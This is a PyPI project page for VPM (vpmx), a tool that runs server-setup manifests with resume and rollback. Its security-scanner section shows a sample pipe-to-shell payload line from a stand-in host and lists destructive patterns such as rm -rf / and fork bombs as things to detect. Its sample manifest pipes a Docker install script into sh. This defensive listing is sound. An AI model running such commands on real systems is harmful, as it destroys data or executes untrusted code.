Virtual Package Manager — resumable, trackable script orchestration for VPS and local environments

Navigation

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for nao-30 from gravatar.com nao-30

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: MIT
    SPDX License Expression
  • Author: Mohammed A. Al-Kebsi
  • Tags vps , orchestration , automation , devops , script-runner , shell , deployment , server-setup , crash-recovery , interactive , manifest
  • Requires: Python >=3.10
Classifiers
Report project as malware

Project description

VPM Logo

VPM — Virtual Package Manager

Resumable, trackable script orchestration for VPS and local environments.
Define steps. Run them. Resume if interrupted. Rollback if needed.

PyPI CI License Python

Why VPM?

You SSH into a server. You need to run 30+ commands to set up Docker, Nginx, firewall, SSL, your app. Halfway through, your connection drops.

With VPM:

  • Write once — Define steps in a simple manifest file
  • Resume anywhere — Interrupted? Just run vpm install again
  • Track everything — Every step's status, exit code, and full output logged
  • Stay safe — Built-in security scanner catches risky commands before execution
  • Undo mistakes — Rollback support reverses completed steps
  • Resolve dependencies — App B needs App A? VPM handles the order
  • Zero dependencies — Pure Python 3.10+ stdlib. Nothing to install but VPM itself

Install

pip install vpmx        # or: pipx install vpmx
vpm doctor              # verify everything works

60-Second Demo

# Create a project
mkdir ~/server-setup && cd ~/server-setup
vpm init

# Edit the manifest (or let an AI agent generate one)
nano vpm-manifest.yaml

# Preview what will run
vpm install --dry-run

# Scan for security issues
vpm audit

# Execute
vpm install

# Check status anytime
vpm status

Manifest Format

# vpm-manifest.yaml

[system_base] Core packages
- label: Update system
  run: sudo apt-get update -y && sudo apt-get upgrade -y

- label: Install essentials
  run: sudo apt-get install -y curl wget git htop
  rollback: sudo apt-get remove -y curl wget git htop

[docker] Docker Engine
requires: system_base

- label: Install Docker
  run: |
    curl -fsSL https://get.docker.com | sh
    sudo usermod -aG docker $USER
  rollback: sudo apt-get remove -y docker-ce

- label: Verify
  run: docker --version

That's it. [app_name], requires:, label:, run:, rollback:. Full manifest docs →

Commands

Command What it does
vpm install Execute manifest (resumes automatically)
vpm install --dry-run Preview without executing
vpm audit Security scan a manifest
vpm run <url> Fetch & execute a remote manifest
vpm rollback <app> Undo completed steps in reverse
vpm status Show all tracked apps
vpm logs <app> Browse execution logs
vpm retry <app> Resume from failure point
vpm reset <app> Clear tracking for fresh install
vpm doctor Diagnose environment

Full commands reference →

Security Scanner

VPM scans manifests before execution — catching dangerous patterns automatically:

⚠ HIGH: Downloading and piping directly to shell interpreter
  Step 1: Install sketchy tool
    curl http://sketchy.xyz/payload | bash
  → Download first, inspect, then execute.

◐ MEDIUM: URL uses suspicious TLD: .xyz
  → Verify this domain is legitimate.
Severity Examples
Critical rm -rf /, fork bombs, disk formatting
High curl | bash, eval $var, chmod 777
Medium Unknown URLs, third-party repos, non-HTTPS
Low sudo usage (expected but noted)

Configurable levels: strict, warn (default), permissive, off. Security docs →

Remote Manifests

Run manifests directly from URLs or GitHub repos:

vpm run https://example.com/setup.yaml
vpm run github:user/repo                    # fetches vpm-manifest.yaml
vpm run github:user/repo/path/file.yaml     # specific file

Security scanning is mandatory for remote manifests.

Crash Recovery

You:     vpm install          # starts running
SSH:     *disconnects*        # step 3 of 8 was running
You:     vpm install          # reconnect, run again
VPM:     Steps 1-2 ✔ skip    # already done
         Step 3 → re-run     # was interrupted
         Steps 4-8 → run     # continue normally

The lock file tracks every step atomically. No corruption, no re-running completed work.

Examples

Real-world manifests in examples/:

For AI Agents

VPM is designed to work with AI assistants. Ask your AI to "create a VPM manifest to set up X" and it works.

  • AGENTS.md — Concise reference for AI context windows
  • llms.txt — Ultra-condensed reference

Documentation

Guide What's covered
Manifest Format Syntax, apps, steps, dependencies, multi-line commands
Commands Reference All CLI commands with flags and examples
Security & Rollback Scanner config, rollback system, remote manifests
How It Works Lock file, step states, crash recovery, change detection
Execution Model PTY execution, interactive support, file locations
Writing Manifests Best practices, patterns, anti-patterns, AI agent guidelines
Troubleshooting Common issues, fixes, architecture overview

Contributing

See CONTRIBUTING.md. No external dependencies — pure Python stdlib.

License

MIT — Mohammed A. Al-Kebsi

Project details

Verified details

These details have been verified by PyPI
Project links
GitHub Statistics
Maintainers
Avatar for nao-30 from gravatar.com nao-30

Unverified details

These details have not been verified by PyPI
Meta
  • License Expression: MIT
    SPDX License Expression
  • Author: Mohammed A. Al-Kebsi
  • Tags vps , orchestration , automation , devops , script-runner , shell , deployment , server-setup , crash-recovery , interactive , manifest
  • Requires: Python >=3.10
Classifiers

Release history Release notifications | RSS feed

This version

1.2.2

1.2.1

1.2.0

1.1.0

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

vpmx-1.2.2.tar.gz (43.5 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

vpmx-1.2.2-py3-none-any.whl (41.3 kB view details)

Uploaded Python 3

File details

Details for the file vpmx-1.2.2.tar.gz.

File metadata

  • Download URL: vpmx-1.2.2.tar.gz
  • Upload date:
  • Size: 43.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.2.tar.gz
Algorithm Hash digest
SHA256 86227369af5ca1dc3769386b19745687b097dad33ff71c6503389e04dc10e136
MD5 9f1a79987090388baeb6bf8ba3163a0c
BLAKE2b-256 ce5fdc384b44e8687d4f12198baa87278b680771c3da67a473cf943294768e03

See more details on using hashes here.

Provenance

The following attestation bundles were made for vpmx-1.2.2.tar.gz:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file vpmx-1.2.2-py3-none-any.whl.

File metadata

  • Download URL: vpmx-1.2.2-py3-none-any.whl
  • Upload date:
  • Size: 41.3 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for vpmx-1.2.2-py3-none-any.whl
Algorithm Hash digest
SHA256 23ed73956ad73d4258d5a035511cf582b0c8f39fee8465591cfd95f77db9ad3d
MD5 23997fb2258d2b55337dc008c4f0e385
BLAKE2b-256 72557775c33ba56c07506447533fc0789c5093c755666be071c74cecbd369577

See more details on using hashes here.

Provenance

The following attestation bundles were made for vpmx-1.2.2-py3-none-any.whl:

Publisher: publish.yml on Nao-30/vpm

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page